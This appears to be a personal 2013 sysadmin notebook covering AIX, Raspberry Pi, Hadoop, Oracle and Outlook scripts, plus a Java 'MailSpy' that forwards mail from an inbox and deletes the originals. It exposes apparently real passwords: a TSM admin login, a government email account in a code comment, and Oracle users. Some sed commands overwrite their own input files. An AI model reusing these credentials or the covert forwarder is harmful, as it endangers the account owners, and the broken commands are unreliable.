I try different account to login system, grant sudo right to this account, change the password using pwdadm and passwd, but when I login with putty, found that Access denied. When I run su - user, found “3004-303 There have been too many unsuccessful login attempts; please see the system administrator”, found the root cause, after google, easy two steps can sovle it.

1 2	- /usr/sbin/lsuser -a unsuccessful_login_count user - /usr/bin/chsec -f /etc/security/lastlog -a unsuccessful_login_count=0 -s user

http://aix4admins.blogspot.hk/2012/06/user-login-process-login-process.html
http://hi.baidu.com/unixsec/item/fa155d8e16cb0cdf5e0ec157"
pwdadm 命令

Ref

expect
expect-lite

2013-12-20

2013-12-20

What stuff in XBian

airplay using ios7
chinese environmnet
- $ sudo apt-get install ttf-wqy-microhei ttf-wqy-zenhei xfonts-wqy
- $ sudo dpkg-reconfigure locales 將zh_SG.UTF-8設定為預設的locale。
sudo apt-get install scim scim-tables-zh scim-pinyin 重開機後，以Ctrl-Space即可切換輸入法，輸入中文。

/etc/apt/apt.conf

1 2	Acquire::http::Proxy "http://proxy.server:port"; Acquire::http::Proxy "http://username:password@proxy.server:port";

Download xbmc addons https://code.google.com/p/xbmc-addons-chinese/
vnc https://github.com/hanzelpeter/dispmanx_vnc

Reference
http://yehnan.blogspot.hk/2012/08/raspberry-pi.html
http://askubuntu.com/questions/109673/how-to-use-apt-get-via-http-proxy-like-this

2013-12-18

2013-12-18

hadoop in win7 with cygwin

Download ‘setup.exe’ from Cygwin website
Download hadoop 0.20.2 and hbase 0.20.6 from apache website

Add user hadoop

1
2
3

$ net user hadoop password /add /yes
$ net localgroup administrator hadoop /add
$ mkpassd -l -u hadoop >> /etc/passwd

Add sshd service

1
2
3

$ cygrunsrv.exe –remove sshd (no necessary)
$ ssh-host-config -y
$ cygrunsrv.exe –start sshd

Generate ssh key

$ ssh-keygen -t dsa -P '' -f ~/.ssh/id_dsa
$ cat ~/.ssh/id_dsa.pub &raquo; ~/.ssh/authorized_keys
$ chmod 600 ~/.ssh/authorized_keys
$ scp ~/.ssh/id_dsa.pub ~/.ssh/authorized_keys 10.13.136.250:/home/hadoop/.ssh

Edit file as below
- core-site.xml
- hdfs-site.xml
- mapred-site.xml
- hadoop-env.sh

Referece

Cygwin for Hadoop (Win 7)
Setting Up Hadoop 0.20.2 on Windows 7 With Cygwin
Hadoop for Windows using Cygwin

2013-12-13

2013-12-13

Get back the console in xbian when booting

system -> setting -> xbian -> service -> disable xbmc autostart-
set parameter in /etc/wpa_supplicant.conf

restart wlan0

1
2
3

# ifconfig wlan0 down
# ifconfig wlan0 up 
# wpa_supplicant -B -c /etc/wpa_supplicant.conf -i wlan0

start xbmc service # sudo service xbmc start or # sudo xbian-config services start xbmc

Encountered problem:

showing fs resize and halt in screen

Solution:

remove splash and quiet in cmdline.txt

Reference
xbian-config-bash
Install Mercury MW150US WIFI dongle on RPi

2013-12-11

2013-12-11

Read mails from Outlook using python

code as following

import win32com.client, sqlite3
from datetime import datetime

def collectMail():
    conn = sqlite3.connect('outlook.db')
    i = 0
    try:
        outlook = win32com.client.Dispatch("Outlook.Application").GetNamespace("MAPI")

        inbox = outlook.GetDefaultFolder(6)
        messages = inbox.Items
        print 'total messages: ', len(messages)
        message = messages.GetFirst ()
        while message:
            i += 1
            try:
                subject = message.Subject
                #print i, subject

                received_time = str(message.ReceivedTime)
                #print received_time
                received_time = datetime.strptime(received_time, '%m/%d/%y %H:%M:%S')
                #print message.EntryID
                html_body = message.HTMLBody
                size = long(message.Size)

                sender =  message.SenderName
                receiver = message.To
                cc = message.Cc
                body = message.Body
                conn.execute('insert into outlook(SUBJECT, SENDER, RECEIVER, CC, SIZE, RECEIVED_TIME, BODY, HTML_BODY) values(?, ?, ?, ?, ?, ?, ?, ?)', (subject, sender, receiver, cc, size, received_time, body, html_body))
                conn.commit()
            except:
                print i, 'skip'
                continue

            message = messages.GetNext()
    finally:
        print 'connection closed'
        conn.close()


collectMail()

sql to create table

create table outlook(
ID INTEGER PRIMARY KEY   AUTOINCREMENT,
SUBJECT VARCHAR(200) NOT NULL,
SENDER VARCHAR(200) NOT NULL,
RECEIVER VARCHAR(200) NOT NULL,
CC  VARCHAR(200) NOT NULL,
SIZE LONG NOT NULL,
RECEIVED_TIME DATETIME,
BODY TEXT,
HTML_BODY TEXT);

Reference

python-script-to-read-the-emails-from-custom-folder-from-microsoft-outlook-mailb
reading-e-mails-from-outlook-with-python-through-mapi
microsoft.office.interop.outlook
sqlite_using_autoincrement

2013-12-10

2013-12-10

vanish(squid) + HAProxy + nginx + memcached(redis)

1. Load-balance then cache

                           +-- Cache server #1 (varnish) -- App server #1
                          /
Load Balancer (haproxy)-+---- Cache server #2 (varnish) --  App server #2
                          \
                           +-- Cache server #3 (varnish) -- App server #3

2. Cache then load-balance

                                                       +-- App server #1
                                                      /
Cache Server (varnish) --- Load Balancer (haproxy) --+---- App server #2
                                                      \
                                                       +-- App server #3

I. stunnel -> vanish -> HAProxy -> nginx -> nodeJS -> memcached(redis) (for sesson storage)
II. nginx (for HTTP compression) –> Varnish cache (for caching) –> HTTP level load balancer (HAProxy, or nginx, or the Varnish built-in) –> webservers.
III. Apache Traffic Server/Squid/Vanish + HAProxy + Nginx + memcached(Redis) (for sesson storage)

Reference:

http://serverfault.com/questions/204025/ordering-1-nginx-2-varnish-3-haproxy-4-webserver
http://yaozb.blog.51cto.com/2762349/793875
http://stackoverflow.com/questions/15448196/haproxy-in-front-of-varnish-or-the-other-way-round
http://blog.exceliance.fr/2012/08/25/haproxy-varnish-and-the-single-hostname-website/
http://serverfault.com/questions/51691/need-haproxy-varnish-nginx-setup-suggestions
https://www.exratione.com/2012/08/websockets-over-ssl-stunnel-varnish-nginx-nodejs/

2013-12-03

2013-12-03

Fail to get tape drive inventory on TSM

tapeutil -f /dev/smc0 inventory | more
errpt -aj indentifierID
dsmadmc -id=support -password=lovedh02
q drive f=d
q path f=d

Basic Troubleshooting Steps for Libraries and Tape Drives for Tivoli Storage Manager on AIX
AIX fast-path problem isolation
MAP 0050: SCSI bus problems
AIX tasks and service aids
Advanced Interactive Executive fast-path problem isolation

2013-11-18

2013-11-18

Install memcached & redis & tokyocabinet & whitedb in AIX

Memcached

for GNU make, download gmake from http://www.bullfreeware.com/affichage.php?id=1264
Download libevent-2.0.21-stable.tar.gz and memcached-1.4.15.tar.gz from offical website

Configure & Install

1 2	./configure --prefix=/home/action/libevent ./configure --with-libevent=/home/action/libevent/ --prefix=/home/action/memcached

Rename method

1
2
3

sed 's/thread_init/thread_init_memcached/g' memcached.h > memcached.h
sed 's/thread_init/thread_init_memcached/g' memcached.c > memcached.c
sed 's/thread_init/thread_init_memcached/g' thread.c > thread.c

Problem
Can’t enable threads without the POSIX thread library.
Solve
Remove “-Wl,-rpath,$ledir/lib” in file configure
Reference
AIX 下安装 memcached

Redis

Download redis from http://www.perzl.org/aix/index.php?n=Main.Redis
Download dependencies from http://www.bullfreeware.com/
check dependency rpm -qRp redis-2.6.16-1.aix5.2.ppc.rpm

check file list

rpm -qlp redis-2.6.16-1.aix5.2.ppc.rpm`
rpm -ivh logrotate-3.8.3-1
rpm -ivh popt-1.16-2
rpm -ivh coreutils-8.21-1

Reference
Redis 2.4持久化测试报告
 nosql-database

tokyocabinet

Download tokyocabinet-1.4.48 from http://fallabs.com/tokyocabinet/

./configure --prefix=/home/action/tokyocabinet
sed 's/-Wl,-soname,libtokyocabinet.so.$(LIBVER)//g' Makefile > Makefile.bak
mv Makefile.bak Makefile
gmake
gmake install

whitedb

Download whitedb-0.6.1 from http://whitedb.org

./configure --prefix=/home/action/whitedb --with-python // found python binding not work
sed 's/LIBS = -lm /LIBS = -lm -lpthread /g' Makefile > Makefile.bak
mv Makefile.bak Makefile
gmake
gmake install

Package in my AIX

rpm -qa

rsync-3.0.6-1
tcl-8.4.7-3
tk-8.4.7-3
expect-5.42.1-3
bash-4.2-1
AIX-rpm-7.1.1.15-2
gettext-0.17-8
gdbm-1.10-1
libiconv-1.14-1
ncurses-5.9-3
info-5.0-2
readline-6.2-3
sqlite-3.7.15.2-2
gmp-5.1.3-1
db-4.8.24-4
zlib-1.2.5-6
libffi-3.0.9-3
bzip2-1.0.6-2
expat-2.1.0-1
python-2.7.2-3
mpfr-3.1.2-1
libmpc-0.9-1
logrotate-3.8.3-1
libgcc-4.8.1-1
zlib-devel-1.2.5-6
bzip2-devel-1.0.6-2
gcc-4.8.1-1
gcc-cpp-4.8.1-1
libstdc++-4.8.1-1
libstdc++-devel-4.8.1-1
gcc-c++-4.8.1-1
make-3.82-2
popt-1.16-2
coreutils-8.21-1
redis-2.6.16-1
python-memcached-1.53-1
python-devel-2.7.2-3

2013-11-15

2013-11-15

Install Python in AIX

Download Python

download the archive zip from http://www.bullfreeware.com/affichage.php?id=1495

Install Python

rpm -ivh libiconv-1.14-1.aix6.1.ppc.rpm –nodeps // important, otherwise throw error of libintl.so 
rpm -ivh gettext-0.17-8.aix6.1.ppc.rpm –nodeps 
rpm -ivh gdbm-1.10-1.aix6.1.ppc.rpm 
rpm -ivh ncurses-5.9-3.aix6.1.ppc.rpm 
rpm -ivh info-5.0-2.aix6.1.ppc.rpm 
rpm -ivh readline-6.2-3.aix6.1.ppc.rpm 
rpm -ivh sqlite-3.7.15.2-2.aix6.1.ppc.rpm 
rpm -ivh gmp-5.1.3-1.aix6.1.ppc.rpm 
rpm -ivh db-4.8.24-4.aix6.1.ppc.rpm 
rpm -ivh zlib-1.2.5-6.aix6.1.ppc.rpm 
rpm -ivh libffi-3.0.9-3.aix6.1.ppc.rpm 
rpm -ivh bzip2-1.0.6-2.aix6.1.ppc.rpm 
rpm -ivh expat-2.1.0-1.aix6.1.ppc.rpm 
rpm -ivh openssl-1.0.0k-2.aix6.1.ppc.rpm 
rpm -ivh python-2.7.2-3.aix6.1.ppc.rpm 
rpm -ivh python-devel-2.7.2-3.aix6.1.ppc.rpm

Create Makefile & pyconfig.h (Sovled after install `python-devel-2.7.2-3.aix6.1.ppc.rpm`)

1 2	mkdir /opt/freeware/lib/python2.7/config touch /opt/freeware/lib/python2.7/config/Makefile mkdir /opt/freeware/include/python2.7 touch /opt/freeware/include/python2.7/pyconfig.h

Problem solve

No module unittest found
copy unittest from windows to aix
aix not support “O_NOFOLLOW”
- https://github.com/pypa/pip/pull/935
  sudo vi /opt/freeware/lib/python2.7/site-packages/pip-1.4.1-py2.7.egg/pip/locations.py
  remove os.O_NOFOLLOW

2013-11-14

2013-11-14

mail spy

MailSpy.java

package forest;

import java.io.IOException;
import java.security.Security;
import java.text.SimpleDateFormat;
import java.util.ArrayList;
import java.util.Date;
import java.util.List;
import java.util.Properties;
import java.util.ResourceBundle;
import java.util.logging.FileHandler;
import java.util.logging.Formatter;
import java.util.logging.LogRecord;
import java.util.logging.Logger;

import javax.activation.DataHandler;
import javax.mail.Authenticator;
import javax.mail.Flags;
import javax.mail.Folder;
import javax.mail.Message;
import javax.mail.MessagingException;
import javax.mail.Part;
import javax.mail.PasswordAuthentication;
import javax.mail.Session;
import javax.mail.Store;
import javax.mail.Transport;
import javax.mail.internet.AddressException;
import javax.mail.internet.InternetAddress;
import javax.mail.internet.MimeBodyPart;
import javax.mail.internet.MimeMessage;
import javax.mail.internet.MimeMultipart;

import com.sun.net.ssl.internal.ssl.Provider;

public class MailSpy {
	public static Logger log = Logger.getLogger("MailSpy");
	private static ResourceBundle mailProperties = ResourceBundle.getBundle("forest.mail");

	private static String username;
	private static String password;
	private static Properties props = new Properties();
	private static SimpleDateFormat sf = new SimpleDateFormat("yyyy-MM-dd HH:mm:ss");

	static {
		try {
			FileHandler fh = new FileHandler(mailProperties.getString("logFile"));
			fh.setFormatter(new Formatter() {
				@Override
				public String format(LogRecord record) {
					return String.format("%s [%s] - %s\n", sf.format(record.getMillis()), record.getLevel(), record
							.getMessage());
				}
			});
			log.addHandler(fh);
		} catch (SecurityException e) {
			e.printStackTrace();
		} catch (IOException e) {
			e.printStackTrace();
		}

		Security.addProvider(new Provider());
		System.setProperty("javax.net.ssl.trustStore", mailProperties.getString("jssecacerts"));

		for (String key : mailProperties.keySet()) {
			props.setProperty(key, mailProperties.getString(key));
		}

		username = mailProperties.getString("username");
		password = mailProperties.getString("password");
	}

	public static void main(String[] args) {
		while (true) {
			try {
				MailSpy util = new MailSpy();
				MailMessage mailMessage = util.getMail();
				if (mailMessage != null) {
					log.info("foward mail");
					util.forwardMail(mailMessage);
				}

			} catch (Exception e) {
				log.severe(e.getMessage());
			}

			try {
				Thread.sleep(10000);
			} catch (InterruptedException e) {
				e.printStackTrace();
			}
		}
	}

	/**
	 *  pharmgeneral@dh.gov.hk pass0424 
	 */
	public void forwardMail(MailMessage mailMessage) throws AddressException, MessagingException {
		Session session = Session.getDefaultInstance(props, new MyAuthenticator(username, password));
		session.setDebug(false);
		MimeMessage msg = new MimeMessage(session);

		if (!mailMessage.getBodyPart().isEmpty()) {

			MimeMultipart multipart = new MimeMultipart();
			for (MimeBodyPart body : mailMessage.getBodyPart()) {
				multipart.addBodyPart(body);
			}
			msg.setContent(multipart);
		} else {
			msg.setText(mailMessage.getBodyText());
		}

		//msg.setFrom(new InternetAddress(mailMessage.getFrom()));
		msg.setFrom(new InternetAddress(username));

		msg.setSender(new InternetAddress(mailMessage.getFrom()));
		msg.setRecipients(Message.RecipientType.TO, mailProperties.getString("forwardTo"));
		//msg.setRecipients(Message.RecipientType.TO, "PRS2.AP1@hp.com");

		log.config("Sender " + mailMessage.getFrom() + ", Cc " + mailProperties.getString("forwardTo"));

		msg.setSubject(mailMessage.getSubject());

		msg.setSentDate(mailMessage.getSent());
		Transport.send(msg);

		log.info("subject: " + mailMessage.getSubject() + " is sent.");
	}

	public MailMessage getMail() {
		Session session = Session.getDefaultInstance(props, new MyAuthenticator(username, password));
		Store store = null;
		MailMessage mailMessage = null;

		try {
			session.setDebug(false);
			store = session.getStore();
			store.connect();

			Folder folder = store.getFolder("INBOX");
			folder.open(Folder.READ_WRITE);

			int count = folder.getMessageCount();
			if (count == 0) {
				log.info("no message");
			} else {
				mailMessage = new MailMessage();
				Message message = folder.getMessage(1);

				Object content = message.getContent();

				mailMessage.setFrom(InternetAddress.toString(message.getFrom()));

				//mailMessage.setReplyTo(InternetAddress.toString(message.getReplyTo()));

				//mailMessage.setTo(InternetAddress.toString(message.getRecipients(Message.RecipientType.TO)));

				//mailMessage.setCc(InternetAddress.toString(message.getRecipients(Message.RecipientType.CC)));

				mailMessage.setSubject(message.getSubject());

				mailMessage.setSent(message.getSentDate());

				if (content instanceof MimeMultipart) {
					MimeMultipart mp = (MimeMultipart) content;
					for (int i = 0, n = mp.getCount(); i < n; i++) {

						Part part = mp.getBodyPart(i);
						DataHandler hd = part.getDataHandler();

						MimeBodyPart messageBodyPart = new MimeBodyPart();
						messageBodyPart.setDataHandler(new DataHandler(hd.getDataSource()));
						mailMessage.getBodyPart().add(messageBodyPart);

						/*String disposition = part.getDisposition();
						if (disposition == null) {
							DataHandler hd = part.getDataHandler();

							MimeBodyPart messageBodyPart = new MimeBodyPart();
							messageBodyPart.setDataHandler(new DataHandler(hd.getDataSource()));
							//messageBodyPart.setFileName(fileName);

							mailMessage.getBodyPart().add(messageBodyPart);
						}

						if ((disposition != null)
								&& (disposition.equals(Part.ATTACHMENT) || (disposition.equals(Part.INLINE)))) {
							String fileName = part.getFileName();
							log.info("file name: " + fileName);
							InputStream in = part.getInputStream();

							ByteArrayDataSource dataSource = new ByteArrayDataSource(in, part.getContentType());
							MimeBodyPart messageBodyPart = new MimeBodyPart();
							messageBodyPart.setDataHandler(new DataHandler(dataSource));
							messageBodyPart.setFileName(fileName);

							mailMessage.getBodyPart().add(messageBodyPart);
						}*/
					}
				} else {
					log.info("content of text/plain " + content);
					mailMessage.setBodyText(content.toString());
				}

				message.setFlag(Flags.Flag.DELETED, true);
			}

			folder.close(true);

		} catch (Exception e) {
			e.printStackTrace();
		} finally {
			try {
				log.fine("store closed");
				store.close();
			} catch (MessagingException e) {
				// TODO Auto-generated catch block
				e.printStackTrace();
			}
		}
		return mailMessage;
	}
}

class MyAuthenticator extends Authenticator {
	private String username;
	private String password;

	public MyAuthenticator(String username, String password) {
		this.username = username;
		this.password = password;
	}

	protected PasswordAuthentication getPasswordAuthentication() {
		MailSpy.log.config("username " + username + " , password " + password);
		return new PasswordAuthentication(username, password);
	}
}

class MailMessage {
	private String from;
	private String replyTo;
	private String to;
	private String cc;
	private Date sent;
	private String subject;
	private String bodyText;
	private List<MimeBodyPart> bodyPart = new ArrayList<MimeBodyPart>();

	public String getFrom() {
		return from;
	}

	public void setFrom(String from) {
		this.from = from;
	}

	public String getReplyTo() {
		return replyTo;
	}

	public void setReplyTo(String replyTo) {
		this.replyTo = replyTo;
	}

	public String getTo() {
		return to;
	}

	public void setTo(String to) {
		this.to = to;
	}

	public Date getSent() {
		return sent;
	}

	public void setSent(Date sent) {
		this.sent = sent;
	}

	public String getSubject() {
		return subject;
	}

	public void setSubject(String subject) {
		this.subject = subject;
	}

	public String getBodyText() {
		return bodyText;
	}

	public void setBodyText(String bodyText) {
		this.bodyText = bodyText;
	}

	public List<MimeBodyPart> getBodyPart() {
		return bodyPart;
	}

	public void setBodyPart(List<MimeBodyPart> bodyPart) {
		this.bodyPart = bodyPart;
	}

	public String getCc() {
		return cc;
	}

	public void setCc(String cc) {
		this.cc = cc;
	}

}

mail.properties

#SMTP
mail.smtp.host=smtpa.host
mail.smtp.socketFactory.class=javax.net.ssl.SSLSocketFactory
mail.smtp.ssl.enable=true
mail.smtp.socketFactory.fallback=false
mail.smtp.port=465
mail.transport.protocol=smtps
mail.smtp.socketFactory.port=465
mail.smtp.auth=true

#POP3
mail.pop3s.host=pop3.host
mail.pop3.socketFactory.class=javax.net.ssl.SSLSocketFactory
mail.pop3.ssl.enable=true
mail.pop3.socketFactory.fallback=false
mail.pop3s.port=995
mail.store.protocol=pop3s
mail.pop3.socketFactory.port=995
mail.pop3s.auth=true

username=abc@abc.com
password=password
forwardTo=xyz@xyz.com

logFile=c:/mail.log
jssecacerts=jssecacerts

2013-11-14

2013-11-14

using cx_Oracle

import cx_Oracle, os

os.environ["NLS_LANG"] = "TRADITIONAL CHINESE_HONG KONG.AL32UTF8"

def trim(str):
    if str == None:
        return ''

def trim2(strs):
    list = []
    for i in strs:
        if i == None:
            list.append('')
        else:
            list.append(i)
    return list

def generateSql(table, fields):
    sql = 'insert into %s(%s) values (' %(table, ','.join(fields.split(',')) )
    sql += ','.join(map(lambda x: ':' + x , fields.split(','))) + ')'
    return sql

def generateValues(fields, row):
    values = {}
    f = fields.split(',')
    for i in range(len(f)):
        values[f[i]] = row[i]
    return values

def district(cur, extCur):
    return ('district', 'MODULE,CAT_ID,CODE,NAME,DIST_CODE,LAST_UPDATE,UPDATE_BY,UPDATE_ROLE,WAIT_COUNT,INSPECTION_DIST_CODE')


def misc(cur, extCur):
    return ('misc', 'NAME,CODE,DESCR,REMARK,UPDATE_ROLE,WAIT_COUNT,LAST_UPDATE,UPDATE_BY,DD,MM,YEAR,PERIOD,TYPE,REMARK1,DENY_RANK,DURATION_PARAM,REPORT_ID,LIC_TYPE_PARAM,DUMMY_PROMPT,DESCR2')


def main():
    os.environ["NLS_LANG"] = "TRADITIONAL CHINESE_HONG KONG.AL32UTF8"
    dsn_tns = cx_Oracle.makedsn('server', 1521, service_name='service-name')

    con = cx_Oracle.connect('dhsms','useruat2621',dsn_tns)
    extCon = cx_Oracle.connect('dhsms_int','useruat0675',dsn_tns)

    cur = con.cursor()
    extCur = extCon.cursor()
    try:
        table, fields = task()
        sql = 'select %s from %s' %(','.join(fields.split(',')), table)
        print sql
        cur.execute(sql)
        res = cur.fetchall()
        for row in res:
            extCur.execute(generateSql(table, fields), generateValues(fields, row))

        extCon.commit()

        cur.close()
        extCur.close()
    except cx_Oracle.DatabaseError, exc:
        print exc
        error, = exc.args
        print error.message
    finally:
        print 'close connection'
        con.close()
        extCon.close()

def updateCompanyPublish():
    uat_dsn_tns = cx_Oracle.makedsn('server', 1521, service_name='uat')
    prd_dsn_tns = cx_Oracle.makedsn('server-2', 1521, service_name='prd')

    uat_con = cx_Oracle.connect('user','password',uat_dsn_tns)
    prd_con = cx_Oracle.connect('user','password',prd_dsn_tns)

    uat_cur = uat_con.cursor()
    prd_cur = prd_con.cursor()

    try:
        prd_cur.execute("select bus_name, bus_name_chn, unit, FLOOR, BLOCK, bldg, st_no, st_name, area_code, brc, brc_br_code from company where brc in ('12813641','05566198','14304442','09774317','17347013','10161559','04052247','10197423','02410516','06508541','19231608','18405151','05528392','08239275','02577649','08593841','06534261','07286166','01491507','07665609','02718104','04502925','37614254','07919620','EXEMPT07','10492160','13343992','02545054','02725127','04795495','16191407','00039087','04452570','05419513','18766876','01244344','05134767','00559994')")
        for row in prd_cur:
            print row
            uat_cur.execute('update company_publish set bus_name=:bus_name,bus_name_chn=:bus_name_chn,unit=:unit,floor=:floor,block=:block,bldg=:bldg,st_no=:st_no,st_name=:st_name,area_code =:area_code where brc = :brc and brc_br_code = :brc_br_code', {'bus_name':row[0], 'bus_name_chn':row[0],'bus_name_chn':row[1],'unit':row[2],'floor':row[3],'block':row[4],'bldg':row[5],'st_no':row[6],'st_name':row[7],'area_code':row[8],'brc':row[9],'brc_br_code':row[10]})

        prd_cur.close()
        uat_cur.close()
        uat_con.commit()

    finally:
        uat_con.close()
        prd_con.close()


#updateCompanyPublish()


def upgradeSeq():
    dsn_tns = cx_Oracle.makedsn('server', 1521, service_name='service-name')


    extCon = cx_Oracle.connect('user','password',dsn_tns)
    extCur = extCon.cursor()
    for i in range(10000):
        extCur.execute('select IE_DRUG_ID_SQ.NEXTVAL FROM DUAL')
    extCur.close()
    extCon.close()


def updateAddress():
    f = open('advert_address.txt')
    c = f.read()
    f.close()
    os.environ["NLS_LANG"] = "TRADITIONAL CHINESE_HONG KONG.AL32UTF8"
    try:
        dsn_tns = cx_Oracle.makedsn('server-2', 1521, 'sid')
        con = cx_Oracle.connect('user','password',dsn_tns)
        cur = con.cursor()


        for line in c.splitlines():
            parts = line.split('\t')
            seq_no = parts[0]
            source_name = parts[1]
            publisher = parts[2]
            address = parts[3]
            fax = parts[4]
            tel = parts[5]
            print seq_no, source_name, publisher, address
            sql = 'update advert_address set source_name = :source_name, publisher = :publisher, address = :address, fax = :fax, tel = :tel where seq_no = :seq_no'
            cur.execute(sql, {'seq_no':seq_no, 'source_name':source_name, 'publisher':publisher, 'address':address, 'fax':fax, 'tel':tel})
        cur.close()
        con.commit()
    finally:
        print 'close connection'
        con.close()


def updateCompanyName():
    f = open('ML data.txt')
    c = f.read()
    f.close()

    try:
        dsn_tns = cx_Oracle.makedsn('server', 1521, 'psuat')
        con = cx_Oracle.connect('user','password',dsn_tns)
        cur = con.cursor()

        for line in c.splitlines():
            parts = line.split('\t')
            name = parts[2]
            file_no = parts[3]
            if file_no != '':
                print name, file_no
            sql = 'update company_publish set bus_name_chn = :name where brc = (select brc from lic_app where file_no = :file_no)'
            cur.execute(sql, {'name':name, 'file_no':file_no})

            sql = 'update company set bus_name_chn = :name where brc = (select brc from lic_app where file_no = :file_no)'
            cur.execute(sql, {'name':name, 'file_no':file_no})

        cur.close()
        con.commit()
    finally:
        print 'close connection'
        con.close()


def updateUMAProdGroup():
    f = open('uma_group.txt')
    c = f.read()
    f.close()

    try:
        dsn_tns = cx_Oracle.makedsn('server-2', 1521, 'sid')
        con = cx_Oracle.connect('user','password',dsn_tns)
        cur = con.cursor()

        for line in c.splitlines():
            parts = line.split('\t')
            name = parts[0]
            code = parts[1]
            descr = parts[2]
            if name != '':
                print name, code, descr

            sql = 'insert into misc(name, code, descr) values (:name, :code, :descr)'
            cur.execute(sql, {'name':name, 'code':code, 'descr':descr})

        cur.close()
        con.commit()
    finally:
        print 'close connection'
        con.close()

main()
#updateUMAProdGroup()

2013-11-13

2013-11-13

Insert Unicode Using cx-Oracle and Setting NLS_LANG for Oracle

set enviroment in python or bash

1 2	os.environ[“NLS_LANG”] = “TRADITIONAL CHINESE_HONG KONG.AL32UTF8” or export NLS_LANG=“TRADITIONAL CHINESE_HONG KONG.AL32UTF8”

get lang in Oracle

1
2
3

SELECT USERENV ('language') FROM DUAL;
select * from v$nls_parameters WHERE parameter IN ( 'NLS_LANGUAGE', 'NLS_TERRITORY', 'NLS_CHARACTERSET');
SELECT * from NLS_DATABASE_PARAMETERS WHERE parameter IN ( 'NLS_LANGUAGE', 'NLS_TERRITORY', 'NLS_CHARACTERSET');

others

1
2
3

select * FROM V$NLS_VALID_VALUES;
select * from NLS_SESSION_PARAMETERS;
select * from database_properties;

2013-10-16

2013-10-16

bash on AIX

Donwload Bash
goto http://www-03.ibm.com/systems/power/software/aix/linux/toolbox/alpha.html

1 2	wget ftp://ftp.software.ibm.com/aix/freeSoftware/aixtoolbox/RPMS/ppc/bash/bash-4.2-1.aix6.1.ppc.rpm` rpm -ivh bash-4.2-1.aix6.1.ppc.rpm

Configure Bash
simple way just type bash in shell
change the default login shell
append a line of /usr/bin/bash to file /etc/security/login.cfg
type chsh in shell

Reference

how-set-bash-default-shell.html
bash-initialization-shell-is-command
bash-key-bindings

2013-10-11

2013-10-11

hadoop on nitrous.io

Prepare SSH

1
2
3

ssh-keygen -t dsa -P '' -f ~/.ssh/id_dsa
cat ~/.ssh/id_dsa.pub >> ~/.ssh/authorized_keys
chmod 600 ~/.ssh/authorized_keys

Configuration

vim /home/action/software/hadoop-1.2.1/conf/hadoop-env.sh
export JAVA_HOME=/usr/lib/jvm/java-7-oracle

bin/hadoop namenode -format

bin/hadoop fs -mkdir input
bin/hadoop fs -put conf input
bin/hadoop fs -cp conf/*.xml input

bin/start-all.sh

bin/hadoop jar hadoop-examples-1.2.1.jar grep input output 'dfs[a-z.]+'
bin/hadoop fs -rmr output

bin/hadoop jar hadoop-examples-1.2.1.jar wordcount input output
bin/hadoop fs -rmr output

bin/stop-all.sh

core-site.xml

<configuration>
    <property>
     <name>fs.default.name</name>
     <value>hdfs://localhost:9000</value>
    </property>
　　<property>
　　　　<name>hadoop.tmp.dir</name>
　　　　<value>/home/action/tmp</value>
　　</property>
</configuration>

hdfs-site.xml

<configuration>
<property>
  <name>dfs.replication</name>
  <value>1</value>
 </property>
</configuration>

mapred-site.xml

<configuration>
 <property>
   <name>mapred.job.tracker</name>
   <value>localhost:9001</value>
 </property>
</configuration>

hadoop.tmp.dir must be set, or it will throw error

admin interface

http://localhost:50030/ Hadoop 管理介面
http://localhost:50060/ Hadoop Task Tracker 状态
http://localhost:50070/ Hadoop DFS 状态

Reference

angelosun.iteye.com
shaurong.blogspot.hk
blog.csdn.net

2013-10-10

2013-10-10

nitrous.io初探

1. Register account

register git
register heroku
register mongolab
create a workspace of nodejs

2. Download package

apache-maven-3.1.0-bin.tar.gz
hadoop-1.2.1-bin.tar.gz
Dropbox-Uploader
lynx2.8.7.tar.gz

Command

npm init
npm install express -g 
npm install grunt-cli -g 
npm install grunt-init -g 
npm install socket.io 
npm install forever -g 
npm install coffee-script -g 
npm install nodemon -g

3. heroku

heroku login
heroku create

run java -cp target/classes:target/dependency/* hello.App
in nitrous then preview http://my-awesome-box-30153.apne1.nitrousbox.com/
git commit -a && git push heroku master then preivew http://agile-thicket-5152.herokuapp.com/

getting-started-with-java
create-a-java-web-application-using-embedded-tomcat
war-deployment

2013-09-18

2013-09-18

login RPi via serial port

Since I have bought a product from adafruit, I need to know how to connect my RPi from PC via serial port.

By default, RPi can be login via serial port due to program getty is running configured in /etc/inittab

Bootup info

When RPi boots up, it would send boot info to serial port since the file /boot/cmdline.txt.

Disable serial port when boots up

add # character to the begining in file /etc/inittab
T0:23:respawn:/sbin/getty -L ttyAMA0 115200 vt100
Remove all reference to ttyAMA0 in file /boot/cmdline.txt
From
1
2
dwc_otg.lpm_enable=0 console=ttyAMA0,115200 kgdboc=ttyAMA0,115200 console=tty1 root=/dev/mmcblk0p2
rootfstype=ext4 elevator=deadline rootwait`
To
dwc_otg.lpm_enable=0 console=tty1 root=/dev/mmcblk0p2 rootfstype=ext4 elevator=deadline rootwait

Reboot

sudo reboot

Test the serial port

stty -F /dev/ttyAMA0 9600
minicom -b 9600 -o -D /dev/ttyAMA0

python serial

1 2	ser = serial.Serial("/dev/ttyAMA0",9600) ser.open()

Reference:

Raspberry Pi and the Serial Port
get terminal access to Pi over USB/serial cable
RPi_Serial_Connection
raspberry-pi-and-arduino-connected-serial-gpio
Raspberry Pi Serial Console With MAX3232CPE

2013-08-27

2013-08-27

升级Crystal Report 8.5 to Crystal Report 2011

升级过程中有两点需要注意：

在AIX安装字体，繁体就用新细明体mingliu.ttf和mingliub.ttf(粗体)，英文就用Times New Roman：times.ttf，timesbd.ttf，timesbi.ttf，timesi.ttf。
设置Locale，因不知为何在AIX上生成的PDF文件编码总是日文语系的，当设置完Locale后问题才得以解决，reportClientDoc.setLocale(Locale.TRADITIONAL_CHINESE);
运行时动态改变datasource的jndi，在oralce上尝试几个方法都失败，但感觉这些code都应该有参考价值的，也会列出来。

ReportServlet

package dh.report;
import java.io.IOException;
import java.util.ArrayList;
import java.util.Calendar;
import java.util.Collections;
import java.util.Date;
import java.util.Enumeration;
import java.util.HashMap;
import java.util.List;
import java.util.Locale;
import java.util.Map;
import java.util.regex.Matcher;
import java.util.regex.Pattern;
import javax.servlet.ServletConfig;
import javax.servlet.ServletException;
import javax.servlet.http.HttpServlet;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;
import com.crystaldecisions.report.web.viewer.CrPrintMode;
import com.crystaldecisions.report.web.viewer.CrystalReportViewer;
import com.crystaldecisions.report.web.viewer.ReportExportControl;
import com.crystaldecisions.sdk.occa.report.application.ISubreportClientDocument;
import com.crystaldecisions.sdk.occa.report.application.ReportClientDocument;
